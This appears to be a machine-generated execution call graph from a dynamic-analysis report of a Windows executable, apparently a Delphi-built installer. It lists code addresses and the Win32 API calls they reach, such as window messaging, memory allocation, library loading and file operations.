                                                                                            execution_graph 52433 40cf00 52434 40cf0d 52433->52434 52436 40cf12 52433->52436 52437 406f50 CloseHandle 52434->52437 52437->52436 52438 402584 52439 402598 52438->52439 52440 4025ab 52438->52440 52468 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52439->52468 52441 4025c2 RtlEnterCriticalSection 52440->52441 52442 4025cc 52440->52442 52441->52442 52454 4023b4 13 API calls 52442->52454 52444 40259d 52444->52440 52446 4025a1 52444->52446 52447 4025d5 52448 4025d9 52447->52448 52455 402088 52447->52455 52450 402635 52448->52450 52451 40262b RtlLeaveCriticalSection 52448->52451 52451->52450 52452 4025e5 52452->52448 52469 402210 9 API calls 52452->52469 52454->52447 52456 40209c 52455->52456 52457 4020af 52455->52457 52476 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52456->52476 52459 4020c6 RtlEnterCriticalSection 52457->52459 52462 4020d0 52457->52462 52459->52462 52460 4020a1 52460->52457 52461 4020a5 52460->52461 52464 402106 52461->52464 52462->52464 52470 401f94 52462->52470 52464->52452 52466 4021f1 RtlLeaveCriticalSection 52467 4021fb 52466->52467 52467->52452 52468->52444 52469->52448 52473 401fa4 52470->52473 52471 401fd0 52475 401ff4 52471->52475 52482 401db4 52471->52482 52473->52471 52473->52475 52477 401f0c 52473->52477 52475->52466 52475->52467 52476->52460 52486 40178c 52477->52486 52481 401f29 52481->52473 52483 401dd2 52482->52483 52484 401e02 52482->52484 52483->52475 52484->52483 52509 401d1c 52484->52509 52487 4017a8 52486->52487 52489 4017b2 52487->52489 52491 40180f 52487->52491 52494 401803 52487->52494 52497 4014e4 52487->52497 52506 4013e0 LocalAlloc 52487->52506 52505 401678 VirtualAlloc 52489->52505 52491->52481 52496 401e80 9 API calls 52491->52496 52493 4017be 52493->52491 52507 4015c0 VirtualFree 52494->52507 52496->52481 52498 4014f3 VirtualAlloc 52497->52498 52500 401520 52498->52500 52501 401543 52498->52501 52508 401398 LocalAlloc 52500->52508 52501->52487 52503 40152c 52503->52501 52504 401530 VirtualFree 52503->52504 52504->52501 52505->52493 52506->52487 52507->52491 52508->52503 52510 401d2e 52509->52510 52511 401d51 52510->52511 52512 401d63 52510->52512 52522 401940 52511->52522 52514 401940 3 API calls 52512->52514 52515 401d61 52514->52515 52516 401d79 52515->52516 52532 401bf8 9 API calls 52515->52532 52516->52483 52518 401d88 52519 401da2 52518->52519 52533 401c4c 9 API calls 52518->52533 52534 401454 LocalAlloc 52519->52534 52523 401966 52522->52523 52531 4019bf 52522->52531 52535 40170c 52523->52535 52527 401983 52529 40199a 52527->52529 52540 4015c0 VirtualFree 52527->52540 52529->52531 52541 401454 LocalAlloc 52529->52541 52531->52515 52532->52518 52533->52519 52534->52516 52538 401743 52535->52538 52536 401783 52539 4013e0 LocalAlloc 52536->52539 52537 40175d VirtualFree 52537->52538 52538->52536 52538->52537 52539->52527 52540->52529 52541->52531 52542 41364c SetWindowLongA GetWindowLongA 52543 4136a9 SetPropA SetPropA 52542->52543 52544 41368b GetWindowLongA 52542->52544 52548 41f3ac 52543->52548 52544->52543 52545 41369a SetWindowLongA 52544->52545 52545->52543 52553 415280 52548->52553 52560 423c1c 52548->52560 52654 423a94 52548->52654 52549 4136f9 52555 41528d 52553->52555 52554 4152f3 52661 424b9c 13 API calls 52554->52661 52555->52554 52556 4152e8 52555->52556 52559 4152f1 52555->52559 52556->52559 52662 41506c 46 API calls 52556->52662 52559->52549 52563 423c52 52560->52563 52583 423c73 52563->52583 52663 423b78 52563->52663 52564 423cfc 52568 423d03 52564->52568 52569 423d37 52564->52569 52565 423c9d 52566 423ca3 52565->52566 52567 423d60 52565->52567 52570 423cd5 52566->52570 52571 423ca8 52566->52571 52574 423d72 52567->52574 52575 423d7b 52567->52575 52576 423d09 52568->52576 52613 423fc1 52568->52613 52572 423d42 52569->52572 52573 4240aa IsIconic 52569->52573 52570->52583 52602 423cee 52570->52602 52603 423e4f 52570->52603 52577 423e06 52571->52577 52578 423cae 52571->52578 52579 4240e6 52572->52579 52580 423d4b 52572->52580 52573->52583 52585 4240be GetFocus 52573->52585 52581 423d88 52574->52581 52582 423d79 52574->52582 52678 4241a4 11 API calls 52575->52678 52586 423f23 SendMessageA 52576->52586 52587 423d17 52576->52587 52691 423b94 NtdllDefWindowProc_A 52577->52691 52589 423cb7 52578->52589 52590 423e2e PostMessageA 52578->52590 52711 424860 WinHelpA PostMessageA 52579->52711 52593 4240fd 52580->52593 52611 423cd0 52580->52611 52679 4241ec IsIconic 52581->52679 52687 423b94 NtdllDefWindowProc_A 52582->52687 52583->52549 52585->52583 52588 4240cf 52585->52588 52586->52583 52587->52583 52587->52611 52632 423f66 52587->52632 52710 41f004 GetCurrentThreadId 73A15940 52588->52710 52597 423cc0 52589->52597 52598 423eb5 52589->52598 52697 423b94 NtdllDefWindowProc_A 52590->52697 52600 424106 52593->52600 52601 42411b 52593->52601 52606 423cc9 52597->52606 52607 423dde IsIconic 52597->52607 52608 423ebe 52598->52608 52609 423eef 52598->52609 52599 423e49 52599->52583 52712 4244e4 52600->52712 52718 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52601->52718 52602->52611 52612 423e1b 52602->52612 52667 423b94 NtdllDefWindowProc_A 52603->52667 52605 4240d6 52605->52583 52616 4240de SetFocus 52605->52616 52606->52611 52617 423da1 52606->52617 52619 423dfa 52607->52619 52620 423dee 52607->52620 52618 423b24 5 API calls 52608->52618 52674 423b94 NtdllDefWindowProc_A 52609->52674 52611->52583 52677 423b94 NtdllDefWindowProc_A 52611->52677 52692 424188 52612->52692 52613->52583 52628 423fe7 IsWindowEnabled 52613->52628 52616->52583 52617->52583 52688 422c5c ShowWindow PostMessageA PostQuitMessage 52617->52688 52627 423ec6 52618->52627 52690 423b94 NtdllDefWindowProc_A 52619->52690 52689 423bd0 15 API calls 52620->52689 52624 423e55 52625 423e93 52624->52625 52626 423e71 52624->52626 52634 423a94 6 API calls 52625->52634 52668 423b24 52626->52668 52636 423ed8 52627->52636 52698 41ef68 52627->52698 52628->52583 52637 423ff5 52628->52637 52631 423ef5 52638 423f0d 52631->52638 52675 41eeb4 GetCurrentThreadId 73A15940 52631->52675 52632->52583 52639 423f88 IsWindowEnabled 52632->52639 52641 423e9b PostMessageA 52634->52641 52704 423b94 NtdllDefWindowProc_A 52636->52704 52647 423ffc IsWindowVisible 52637->52647 52645 423a94 6 API calls 52638->52645 52639->52583 52646 423f96 52639->52646 52641->52583 52645->52583 52705 412320 7 API calls 52646->52705 52647->52583 52649 42400a GetFocus 52647->52649 52706 4181f0 52649->52706 52651 42401f SetFocus 52708 415250 52651->52708 52655 423b1d 52654->52655 52656 423aa4 52654->52656 52655->52549 52656->52655 52657 423aaa EnumWindows 52656->52657 52657->52655 52658 423ac6 GetWindow GetWindowLongA 52657->52658 52850 423a2c GetWindow 52657->52850 52659 423ae5 52658->52659 52659->52655 52660 423b11 SetWindowPos 52659->52660 52660->52655 52660->52659 52661->52559 52662->52559 52664 423b82 52663->52664 52665 423b8d 52663->52665 52664->52665 52719 408728 GetSystemDefaultLCID 52664->52719 52665->52564 52665->52565 52667->52624 52669 423b72 PostMessageA 52668->52669 52670 423b33 52668->52670 52669->52583 52670->52669 52671 423b6a 52670->52671 52673 423b5e SetWindowPos 52670->52673 52822 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52671->52822 52673->52670 52673->52671 52674->52631 52676 41ef39 52675->52676 52676->52638 52677->52583 52678->52583 52680 4241fd SetActiveWindow 52679->52680 52684 424233 52679->52684 52823 42365c 52680->52823 52683 423b24 5 API calls 52685 42421a 52683->52685 52684->52583 52685->52684 52686 42422d SetFocus 52685->52686 52686->52684 52687->52583 52688->52583 52689->52583 52690->52583 52691->52583 52835 41db40 52692->52835 52695 4241a0 52695->52583 52696 424194 LoadIconA 52696->52695 52697->52599 52699 41ef70 IsWindow 52698->52699 52700 41ef9c 52698->52700 52701 41ef8a 52699->52701 52702 41ef7f EnableWindow 52699->52702 52700->52636 52701->52699 52701->52700 52703 402660 4 API calls 52701->52703 52702->52701 52703->52701 52704->52583 52705->52583 52707 4181fa 52706->52707 52707->52651 52709 41526b SetFocus 52708->52709 52709->52583 52710->52605 52711->52599 52713 4244f0 52712->52713 52714 42450a 52712->52714 52715 4244f7 SendMessageA 52713->52715 52717 42451f 52713->52717 52716 402648 4 API calls 52714->52716 52715->52717 52716->52717 52717->52583 52718->52599 52774 408570 GetLocaleInfoA 52719->52774 52724 408570 5 API calls 52725 40877d 52724->52725 52726 408570 5 API calls 52725->52726 52727 4087a1 52726->52727 52786 4085bc GetLocaleInfoA 52727->52786 52730 4085bc GetLocaleInfoA 52731 4087d1 52730->52731 52732 408570 5 API calls 52731->52732 52733 4087eb 52732->52733 52734 4085bc GetLocaleInfoA 52733->52734 52735 408808 52734->52735 52736 408570 5 API calls 52735->52736 52737 408822 52736->52737 52738 403450 4 API calls 52737->52738 52739 40882f 52738->52739 52740 408570 5 API calls 52739->52740 52741 408844 52740->52741 52742 403450 4 API calls 52741->52742 52743 408851 52742->52743 52744 4085bc GetLocaleInfoA 52743->52744 52745 40885f 52744->52745 52746 408570 5 API calls 52745->52746 52747 408879 52746->52747 52748 403450 4 API calls 52747->52748 52749 408886 52748->52749 52750 408570 5 API calls 52749->52750 52751 40889b 52750->52751 52775 408597 52774->52775 52776 4085a9 52774->52776 52802 4034e0 52775->52802 52778 403494 4 API calls 52776->52778 52779 4085a7 52778->52779 52780 403450 52779->52780 52781 403454 52780->52781 52784 403464 52780->52784 52783 4034bc 4 API calls 52781->52783 52781->52784 52782 403490 52782->52724 52783->52784 52784->52782 52817 402660 52784->52817 52787 4085d8 52786->52787 52787->52730 52807 4034bc 52802->52807 52804 4034f0 52805 403400 4 API calls 52804->52805 52806 403508 52805->52806 52806->52779 52808 4034c0 52807->52808 52809 4034dc 52807->52809 52812 402648 52808->52812 52809->52804 52811 4034c9 52811->52804 52813 40264c 52812->52813 52814 402656 52812->52814 52813->52814 52816 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52813->52816 52814->52811 52814->52814 52816->52814 52818 402664 52817->52818 52819 40266e 52817->52819 52818->52819 52821 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52818->52821 52819->52782 52821->52819 52822->52669 52831 423608 SystemParametersInfoA 52823->52831 52826 423675 ShowWindow 52828 423680 52826->52828 52829 423687 52826->52829 52834 423638 SystemParametersInfoA 52828->52834 52829->52683 52832 423626 52831->52832 52832->52826 52833 423638 SystemParametersInfoA 52832->52833 52833->52826 52834->52829 52838 41db64 52835->52838 52839 41db4a 52838->52839 52840 41db71 52838->52840 52839->52695 52839->52696 52840->52839 52847 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52840->52847 52842 41db8e 52842->52839 52843 41dba8 52842->52843 52844 41db9b 52842->52844 52848 41bd9c 11 API calls 52843->52848 52849 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52844->52849 52847->52842 52848->52839 52849->52839 52851 423a4d GetWindowLongA 52850->52851 52852 423a59 52850->52852 52851->52852 52853 490c98 52854 490ccc 52853->52854 52855 490cce 52854->52855 52856 490ce2 52854->52856 52999 4467f0 18 API calls 52855->52999 52859 490d1e 52856->52859 52860 490cf1 52856->52860 52858 490cd7 Sleep 52920 490d55 52858->52920 52865 490d5a 52859->52865 52866 490d2d 52859->52866 52862 44684c 18 API calls 52860->52862 52864 490d00 52862->52864 52868 490d08 FindWindowA 52864->52868 52871 490d69 52865->52871 52872 490db0 52865->52872 52989 44684c 52866->52989 52870 446acc 5 API calls 52868->52870 52869 490d3a 52873 490d42 FindWindowA 52869->52873 52900 490d19 52870->52900 53000 4467f0 18 API calls 52871->53000 52877 490e0c 52872->52877 52878 490dbf 52872->52878 52993 446acc 52873->52993 52876 490d75 53001 4467f0 18 API calls 52876->53001 52885 490e1b 52877->52885 52891 490e68 52877->52891 53004 4467f0 18 API calls 52878->53004 52880 490d82 53002 4467f0 18 API calls 52880->53002 52883 490dcb 53005 4467f0 18 API calls 52883->53005 52884 490d8f 53003 4467f0 18 API calls 52884->53003 53009 4467f0 18 API calls 52885->53009 52889 490dd8 53006 4467f0 18 API calls 52889->53006 52890 490d9a SendMessageA 52895 446acc 5 API calls 52890->52895 52896 490ea2 52891->52896 52897 490e77 52891->52897 52892 490e27 53010 4467f0 18 API calls 52892->53010 52894 490de5 53007 4467f0 18 API calls 52894->53007 52895->52900 52906 490eb1 52896->52906 52907 490ef0 52896->52907 52901 44684c 18 API calls 52897->52901 52900->52920 52904 490e84 52901->52904 52902 490e34 53011 4467f0 18 API calls 52902->53011 52903 490df0 PostMessageA 53008 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52903->53008 52911 490e8c RegisterClipboardFormatA 52904->52911 53014 4467f0 18 API calls 52906->53014 52918 490eff 52907->52918 52919 490f44 52907->52919 52909 490e41 53012 4467f0 18 API calls 52909->53012 52915 446acc 5 API calls 52911->52915 52913 490e4c SendNotifyMessageA 53013 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52913->53013 52914 490ebd 53015 4467f0 18 API calls 52914->53015 52915->52920 53017 4467f0 18 API calls 52918->53017 52926 490f98 52919->52926 52927 490f53 52919->52927 53039 403420 52920->53039 52921 490eca 53016 4467f0 18 API calls 52921->53016 52924 490f0b 53018 4467f0 18 API calls 52924->53018 52925 490ed5 SendMessageA 52930 446acc 5 API calls 52925->52930 52935 490ffa 52926->52935 52936 490fa7 52926->52936 53021 4467f0 18 API calls 52927->53021 52929 490f18 53019 4467f0 18 API calls 52929->53019 52930->52900 52933 490f5f 53022 4467f0 18 API calls 52933->53022 52934 490f23 PostMessageA 53020 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52934->53020 52943 491009 52935->52943 52944 491081 52935->52944 52939 44684c 18 API calls 52936->52939 52941 490fb4 52939->52941 52940 490f6c 53023 4467f0 18 API calls 52940->53023 53025 42e2bc SetErrorMode 52941->53025 52947 44684c 18 API calls 52943->52947 52954 491090 52944->52954 52955 4910b6 52944->52955 52946 490f77 SendNotifyMessageA 53024 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52946->53024 52950 491018 52947->52950 52948 490fc1 52951 490fd7 GetLastError 52948->52951 52952 490fc7 52948->52952 53028 4467f0 18 API calls 52950->53028 52956 446acc 5 API calls 52951->52956 52953 446acc 5 API calls 52952->52953 52957 490fd5 52953->52957 53033 4467f0 18 API calls 52954->53033 52962 4910e8 52955->52962 52963 4910c5 52955->52963 52956->52957 52961 446acc 5 API calls 52957->52961 52960 49109a FreeLibrary 53034 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52960->53034 52961->52920 52972 4910f7 52962->52972 52978 49112b 52962->52978 52966 44684c 18 API calls 52963->52966 52964 49102b GetProcAddress 52967 491071 52964->52967 52968 491037 52964->52968 52969 4910d1 52966->52969 53032 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52967->53032 53029 4467f0 18 API calls 52968->53029 52974 4910d9 CreateMutexA 52969->52974 53035 48ae84 18 API calls 52972->53035 52973 491043 53030 4467f0 18 API calls 52973->53030 52974->52920 52977 491050 52981 446acc 5 API calls 52977->52981 52978->52920 53037 48ae84 18 API calls 52978->53037 52980 491103 52982 491114 OemToCharBuffA 52980->52982 52983 491061 52981->52983 53036 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52982->53036 53031 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52983->53031 52986 491146 52987 491157 CharToOemBuffA 52986->52987 53038 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52987->53038 52990 446854 52989->52990 53043 4358cc 52990->53043 52992 446873 52992->52869 52994 446ad4 52993->52994 53069 435c34 VariantClear 52994->53069 52996 446af7 52997 446b0e 52996->52997 53070 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52996->53070 52997->52920 52999->52858 53000->52876 53001->52880 53002->52884 53003->52890 53004->52883 53005->52889 53006->52894 53007->52903 53008->52900 53009->52892 53010->52902 53011->52909 53012->52913 53013->52920 53014->52914 53015->52921 53016->52925 53017->52924 53018->52929 53019->52934 53020->52900 53021->52933 53022->52940 53023->52946 53024->52920 53071 403738 53025->53071 53028->52964 53029->52973 53030->52977 53031->52900 53032->52900 53033->52960 53034->52920 53035->52980 53036->52920 53037->52986 53038->52920 53041 403426 53039->53041 53040 40344b 53041->53040 53042 402660 4 API calls 53041->53042 53042->53041 53044 4358d8 53043->53044 53045 4358fa 53043->53045 53044->53045 53063 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53044->53063 53046 43597d 53045->53046 53048 435941 53045->53048 53049 435971 53045->53049 53050 435965 53045->53050 53051 43594d 53045->53051 53060 435959 53045->53060 53068 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53046->53068 53064 403510 53048->53064 53067 4040e8 18 API calls 53049->53067 53055 403494 4 API calls 53050->53055 53054 403510 4 API calls 53051->53054 53059 435956 53054->53059 53061 43596e 53055->53061 53058 43598e 53058->52992 53059->52992 53060->52992 53061->52992 53062 43597a 53062->52992 53063->53045 53065 4034e0 4 API calls 53064->53065 53066 40351d 53065->53066 53066->52992 53067->53062 53068->53058 53069->52996 53070->52997 53072 40373c LoadLibraryA 53071->53072 53072->52948 53073 416b52 53074 416bfa 53073->53074 53075 416b6a 53073->53075 53092 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53074->53092 53077 416b84 SendMessageA 53075->53077 53078 416b78 53075->53078 53088 416bd8 53077->53088 53079 416b82 CallWindowProcA 53078->53079 53080 416b9e 53078->53080 53079->53088 53089 41a068 GetSysColor 53080->53089 53083 416ba9 SetTextColor 53084 416bbe 53083->53084 53090 41a068 GetSysColor 53084->53090 53086 416bc3 SetBkColor 53091 41a6f0 GetSysColor CreateBrushIndirect 53086->53091 53089->53083 53090->53086 53091->53088 53092->53088 53093 416654 53094 416661 53093->53094 53095 4166bb 53093->53095 53100 416560 CreateWindowExA 53094->53100 53096 416668 SetPropA SetPropA 53096->53095 53097 41669b 53096->53097 53098 4166ae SetWindowPos 53097->53098 53098->53095 53100->53096 53101 42e317 SetErrorMode 53102 42f394 53103 42f3a3 NtdllDefWindowProc_A 53102->53103 53104 42f39f 53102->53104 53103->53104 53105 4162da 53106 416306 53105->53106 53107 4162e6 GetClassInfoA 53105->53107 53107->53106 53108 4162fa GetClassInfoA 53107->53108 53108->53106 53109 48fed4 53110 48ff0e 53109->53110 53111 48ff1a 53110->53111 53112 48ff10 53110->53112 53114 48ff29 53111->53114 53115 48ff52 53111->53115 53304 4090a0 MessageBeep 53112->53304 53117 44684c 18 API calls 53114->53117 53122 48ff8a 53115->53122 53123 48ff61 53115->53123 53116 403420 4 API calls 53118 490566 53116->53118 53119 48ff36 53117->53119 53120 403400 4 API calls 53118->53120 53305 406bb8 53119->53305 53124 49056e 53120->53124 53129 48ff99 53122->53129 53135 48ffc2 53122->53135 53126 44684c 18 API calls 53123->53126 53128 48ff6e 53126->53128 53313 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53128->53313 53131 44684c 18 API calls 53129->53131 53134 48ffa6 53131->53134 53132 48ff79 53314 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53132->53314 53315 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53134->53315 53138 48ffea 53135->53138 53139 48ffd1 53135->53139 53136 48ff15 53136->53116 53145 48fff9 53138->53145 53146 49001e 53138->53146 53317 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53139->53317 53141 48ffb1 53316 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53141->53316 53142 48ffd9 53318 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53142->53318 53147 44684c 18 API calls 53145->53147 53149 49002d 53146->53149 53150 490056 53146->53150 53148 490006 53147->53148 53319 4072b0 53148->53319 53152 44684c 18 API calls 53149->53152 53157 49008e 53150->53157 53158 490065 53150->53158 53154 49003a 53152->53154 53153 49000e 53322 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53153->53322 53323 42c7d0 53154->53323 53163 4900da 53157->53163 53164 49009d 53157->53164 53160 44684c 18 API calls 53158->53160 53162 490072 53160->53162 53333 407200 8 API calls 53162->53333 53170 4900e9 53163->53170 53171 490112 53163->53171 53166 44684c 18 API calls 53164->53166 53169 4900ac 53166->53169 53167 49007d 53334 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53167->53334 53172 44684c 18 API calls 53169->53172 53173 44684c 18 API calls 53170->53173 53178 49014a 53171->53178 53179 490121 53171->53179 53174 4900bd 53172->53174 53175 4900f6 53173->53175 53335 48fbd8 8 API calls 53174->53335 53337 42c870 53175->53337 53186 490159 53178->53186 53187 490182 53178->53187 53182 44684c 18 API calls 53179->53182 53180 4900c9 53336 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53180->53336 53185 49012e 53182->53185 53343 42c898 53185->53343 53189 44684c 18 API calls 53186->53189 53194 4901ba 53187->53194 53195 490191 53187->53195 53192 490166 53189->53192 53352 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53192->53352 53201 4901c9 53194->53201 53202 4901f2 53194->53202 53196 44684c 18 API calls 53195->53196 53198 49019e 53196->53198 53197 490171 53353 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53197->53353 53354 42c8f8 53198->53354 53204 44684c 18 API calls 53201->53204 53207 49023e 53202->53207 53208 490201 53202->53208 53206 4901d6 53204->53206 53360 42c920 53206->53360 53215 49024d 53207->53215 53216 490290 53207->53216 53210 44684c 18 API calls 53208->53210 53212 490210 53210->53212 53214 44684c 18 API calls 53212->53214 53218 490221 53214->53218 53217 44684c 18 API calls 53215->53217 53223 49029f 53216->53223 53224 490303 53216->53224 53219 490260 53217->53219 53366 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53218->53366 53221 44684c 18 API calls 53219->53221 53225 490271 53221->53225 53222 49022d 53367 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53222->53367 53227 44684c 18 API calls 53223->53227 53231 490342 53224->53231 53232 490312 53224->53232 53368 48fdd0 12 API calls 53225->53368 53229 4902ac 53227->53229 53296 42c5d4 7 API calls 53229->53296 53230 49027f 53369 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53230->53369 53242 490381 53231->53242 53243 490351 53231->53243 53235 44684c 18 API calls 53232->53235 53239 49031f 53235->53239 53236 4902ba 53237 4902be 53236->53237 53238 4902f3 53236->53238 53241 44684c 18 API calls 53237->53241 53371 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53238->53371 53372 451f68 53239->53372 53246 4902cd 53241->53246 53251 4903c0 53242->53251 53252 490390 53242->53252 53247 44684c 18 API calls 53243->53247 53245 49032c 53379 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53245->53379 53297 4522e0 53246->53297 53250 49035e 53247->53250 53380 451dd0 53250->53380 53261 490408 53251->53261 53262 4903cf 53251->53262 53255 44684c 18 API calls 53252->53255 53253 4902dd 53370 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53253->53370 53258 49039d 53255->53258 53257 49036b 53387 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53257->53387 53388 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53258->53388 53267 490450 53261->53267 53268 490417 53261->53268 53264 44684c 18 API calls 53262->53264 53263 4903aa 53389 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53263->53389 53266 4903de 53264->53266 53269 44684c 18 API calls 53266->53269 53273 490463 53267->53273 53280 490519 53267->53280 53270 44684c 18 API calls 53268->53270 53271 4903ef 53269->53271 53272 490426 53270->53272 53275 446acc 5 API calls 53271->53275 53274 44684c 18 API calls 53272->53274 53276 44684c 18 API calls 53273->53276 53277 490437 53274->53277 53275->53136 53278 490490 53276->53278 53283 446acc 5 API calls 53277->53283 53279 44684c 18 API calls 53278->53279 53281 4904a7 53279->53281 53280->53136 53393 4467f0 18 API calls 53280->53393 53390 407de4 7 API calls 53281->53390 53283->53136 53284 490532 53394 42e73c FormatMessageA 53284->53394 53289 4904c9 53290 44684c 18 API calls 53289->53290 53291 4904dd 53290->53291 53391 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53291->53391 53293 4904e8 53392 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53293->53392 53295 4904f4 53296->53236 53399 451d84 53297->53399 53299 4522fd 53299->53253 53300 4522f9 53300->53299 53301 452321 MoveFileA GetLastError 53300->53301 53405 451dc0 53301->53405 53304->53136 53306 406bc7 53305->53306 53307 406be0 53306->53307 53308 406be9 53306->53308 53309 403400 4 API calls 53307->53309 53408 403778 53308->53408 53311 406be7 53309->53311 53312 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53311->53312 53312->53136 53313->53132 53314->53136 53315->53141 53316->53136 53317->53142 53318->53136 53320 403738 53319->53320 53321 4072ba SetCurrentDirectoryA 53320->53321 53321->53153 53322->53136 53324 403738 53323->53324 53325 42c7f3 GetFullPathNameA 53324->53325 53326 42c816 53325->53326 53327 42c7ff 53325->53327 53329 403494 4 API calls 53326->53329 53327->53326 53328 42c807 53327->53328 53330 4034e0 4 API calls 53328->53330 53331 42c814 53329->53331 53330->53331 53332 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53331->53332 53332->53136 53333->53167 53334->53136 53335->53180 53336->53136 53415 42c768 53337->53415 53340 403778 4 API calls 53341 42c891 53340->53341 53342 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53341->53342 53342->53136 53430 42c640 53343->53430 53346 42c8b5 53349 403778 4 API calls 53346->53349 53347 42c8ac 53348 403400 4 API calls 53347->53348 53350 42c8b3 53348->53350 53349->53350 53351 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53350->53351 53351->53136 53352->53197 53353->53136 53355 42c768 IsDBCSLeadByte 53354->53355 53356 42c908 53355->53356 53357 403778 4 API calls 53356->53357 53358 42c91a 53357->53358 53359 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53358->53359 53359->53136 53361 42c768 IsDBCSLeadByte 53360->53361 53362 42c930 53361->53362 53363 403778 4 API calls 53362->53363 53364 42c941 53363->53364 53365 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53364->53365 53365->53136 53366->53222 53367->53136 53368->53230 53369->53136 53370->53136 53371->53136 53373 451d84 2 API calls 53372->53373 53375 451f7e 53373->53375 53374 451f82 53374->53245 53375->53374 53376 451f9e DeleteFileA GetLastError 53375->53376 53377 451dc0 Wow64RevertWow64FsRedirection 53376->53377 53378 451fc4 53377->53378 53378->53245 53379->53136 53381 451d84 2 API calls 53380->53381 53383 451de6 53381->53383 53382 451dea 53382->53257 53383->53382 53384 451e08 CreateDirectoryA GetLastError 53383->53384 53385 451dc0 Wow64RevertWow64FsRedirection 53384->53385 53386 451e2e 53385->53386 53386->53257 53387->53136 53388->53263 53389->53136 53390->53289 53391->53293 53392->53295 53393->53284 53395 42e762 53394->53395 53396 4034e0 4 API calls 53395->53396 53397 42e77f 53396->53397 53398 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53397->53398 53398->53136 53400 451d92 53399->53400 53401 451d8e 53399->53401 53402 451db4 SetLastError 53400->53402 53403 451d9b Wow64DisableWow64FsRedirection 53400->53403 53401->53300 53404 451daf 53402->53404 53403->53404 53404->53300 53406 451dc5 Wow64RevertWow64FsRedirection 53405->53406 53407 451dcf 53405->53407 53406->53407 53407->53253 53409 4037aa 53408->53409 53412 40377d 53408->53412 53410 403400 4 API calls 53409->53410 53411 4037a0 53410->53411 53411->53311 53412->53409 53413 403791 53412->53413 53414 4034e0 4 API calls 53413->53414 53414->53411 53420 42c648 53415->53420 53417 42c7c7 53417->53340 53418 42c77d 53418->53417 53427 42c454 IsDBCSLeadByte 53418->53427 53423 42c659 53420->53423 53421 42c6bd 53424 42c6b8 53421->53424 53429 42c454 IsDBCSLeadByte 53421->53429 53423->53421 53426 42c677 53423->53426 53424->53418 53426->53424 53428 42c454 IsDBCSLeadByte 53426->53428 53427->53418 53428->53426 53429->53424 53431 42c648 IsDBCSLeadByte 53430->53431 53432 42c647 53431->53432 53432->53346 53432->53347 53433 46ad18 53434 46ad4e 53433->53434 53469 46b037 53433->53469 53436 46ad8a 53434->53436 53439 46add4 53434->53439 53440 46ade5 53434->53440 53441 46adb2 53434->53441 53442 46adc3 53434->53442 53443 46ada1 53434->53443 53435 403400 4 API calls 53437 46b071 53435->53437 53436->53469 53528 4683b4 53436->53528 53446 403400 4 API calls 53437->53446 53709 46aa98 67 API calls 53439->53709 53710 46aca8 45 API calls 53440->53710 53708 46a790 42 API calls 53441->53708 53493 46a8d8 53442->53493 53473 46a628 53443->53473 53450 46b079 53446->53450 53451 46ae1e 53464 46ae60 53451->53464 53451->53469 53711 493200 53451->53711 53454 46af71 53730 481938 123 API calls 53454->53730 53455 414af8 